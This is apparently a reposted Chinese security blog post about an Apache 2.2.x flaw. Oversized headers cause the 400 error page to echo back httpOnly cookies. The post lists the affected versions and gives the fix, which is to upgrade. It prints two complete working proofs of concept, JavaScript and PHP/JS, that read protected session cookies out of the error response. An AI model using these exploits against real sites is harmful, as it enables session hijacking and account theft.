最新消息:
    你的位置:jinglingshu的博客 > Apache > Apache httpOnly Cookie泄露分析与测试

    Apache httpOnly Cookie泄露分析与测试

    Apache admin 6150浏览 0评论

    Apache HTTP Server 2.2.x多个版本没有正确严格限制HTTP请求头信息,HTTP请求头信息超过LimitRequestFieldSize长度时服务器返回 400(Bad Request)错误,并在返回信息中将出错请求头内容爆出,攻击者可以利用该漏洞获取httponly cookies。
    受影响版本:
    2.2.21, 2.2.20, 2.2.19, 2.2.18, 2.2.17, 2.2.16, 2.2.15, 2.2.14, 2.2.13, 2.2.12, 2.2.11, 2.2.10, 2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0

    测试方法
    1.测试环境
    Apache/2.2.4 (Win32) PHP/5.2.0

    firefox->访问存在漏洞站点x-bug.com,并打开firebug插件并在运行样输入exp

    // http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();

    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}

makeRequest();

    运行结果

    119

     

    120

     

    php利用演示:

    1. poc

    <?php
header("Set-Cookie: SESSIONID=ImAhttpOnlyCookie; path=/; httponly");
?>
<script type="text/javascript">
var today = new Date();
var expire = new Date();
expire.setTime(today.getTime() + 2000);
gotCookie=false;
padding="";
for (j=0;j<=1000;++j) {
    padding+="A";
}
for (i=0;i < 10; ++i) {
    document.cookie="z"+i+"="+padding+"; expires="+expire.toGMTString()+"; path=/;"
}

function handler() {
    if (!gotCookie && this.responseText.length > 1) {
        text = /(SESSIONID=[^;]*)/i.exec(this.responseText);
        alert(text[1]);
        gotCookie=true;
    }
}

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = handler;
xhr.open("GET", "/httponly.php");
xhr.send();
</script>

    2.测试结果:

    121

     

    apache修复方案: 升级apache

    参考:http://httpd.apache.org/security/vulnerabilities_22.html

     

     

     

    转载请注明:jinglingshu的博客 » Apache httpOnly Cookie泄露分析与测试

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址

    网友最新评论 (2)

    1. 转自:http://www.taobaotest.com/blogs/2096
      admin11年前 (2014-06-11)回复
    2. 做生意没什么秘密,秘密就是让客户满意。
      韩国女装品牌网站9年前 (2016-03-26)回复